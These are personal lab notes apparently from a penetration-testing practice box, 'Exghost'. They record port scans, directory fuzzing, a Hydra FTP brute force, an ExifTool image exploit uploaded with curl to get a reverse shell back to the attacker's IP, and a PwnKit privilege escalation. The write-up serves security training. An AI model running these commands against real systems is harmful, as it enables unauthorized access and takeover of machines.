Exghost (easy)

[WDavid404]

keypoints:

• FTP brute-force hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183
• PwnKit Vulnerability (CVE-2021–4034) --pythone version for exploit

Learned:

• FFUF may get more info than feroxbuster

[WDavid404]

PORT   STATE  SERVICE  REASON         VERSION
21/tcp open   ftp      syn-ack ttl 61 vsftpd 3.0.3
80/tcp open   http     syn-ack ttl 61 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: 403 Forbidden

FTP via anonymouse --> faile

search vsftpd 3.0.3 exploit --> https://www.exploit-db.com/exploits/49719 (Remote Denial of Service) search apache 2.4.41 exploit --> no useful info

feroxbuster -u http://192.168.243.183/ -k -C 404,503,502 --> /uploads (301)

ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.183/FUZZ
--> get more info: /uploads /exiftool /server-status

Access /exiftool --> get version info: '12.23' ---> https://www.exploit-db.com/exploits/50911 --> however, didn't find a way to use it

Try brute-forse FTP: hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183

ftp login ls command --> "229 Entering Extended Passive Mode" resolve: input "passive" command “get backup" to download backup file -->

Prepare an image python3 50911.py -s 192.168.45.192 4444 --> generate a jpg image file.

curl -POST -F myFile=@/home/kali/pen-200/PGBox/image.jpg 192.168.243.183/exiftest.php -H 'Content-Type: multipart/form-data' -vv --> get reverse shell

linpeas.sh -->CVE-2021–4034 ---> There is python instead of compiling c++: https://github.com/joeammond/CVE-2021-4034.git -->